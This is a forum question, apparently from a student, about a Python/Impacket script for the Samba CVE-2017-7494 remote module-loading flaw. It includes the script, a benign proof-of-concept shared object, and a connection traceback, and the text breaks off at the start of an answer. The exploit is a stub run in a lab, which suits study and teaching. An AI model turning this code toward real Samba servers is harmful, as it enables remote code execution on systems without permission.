I am doing a small school cybersec project, and there is one small bug in my Python script (using the Impacket library: the transport module for RPC). It is a very simple script, and the payload can be found on GitHub for your reference: https://github.com/omri9741/cve-2017-7494/blob/master/exploit.py
from optparse import OptionParser
from impacket.dcerpc.v5 import transport


def main():
    parser = OptionParser()
    parser.add_option("-t", "--target", dest="target", help="target ip address")
    parser.add_option("-m", "--module", dest="module",
                      help="module path on target server")
    (options, args) = parser.parse_args()
    if options.target and options.module:
        # SMB named-pipe string binding: ncacn_np:<host>[\pipe\<name>]
        stringbinding = r'ncacn_np:%s[\pipe\%s]' % (options.target, options.module)
        rpctransport = transport.DCERPCTransportFactory(stringbinding)
        dce = rpctransport.get_dce_rpc()
        dce.connect()
    else:
        parser.print_help()


if __name__ == "__main__":
    main()
I have set up the whole system (Kali Linux 2017.1) including a Samba server (4.5.8), and the Samba shares have already been tested and work (connecting OK, file transfer OK). I verified that NO firewall services are running. The payload has also been built into the shared object libpoc.so from this C file:
#include <stdio.h>

int samba_init_module(void)
{
    printf("hello from cve-2017-7494 poc! ;)\n");
    return 0;
}
And the header file:
#ifndef poc_h__
#define poc_h__
extern int samba_init_module(void);
#endif // poc_h__
When running the command:
python exploit.py -t //localhost/pentest -m /localhost/pentest/libpoc.so
I get this traceback:
    raise socket.error("Connection error (%s:%s)" % (peer[0], peer[1]), e)
socket.error: [Errno Connection error (localhost/pentest:445)] [Errno -2] Name or service not known
You should specify just the target FQDN or IP address. For example: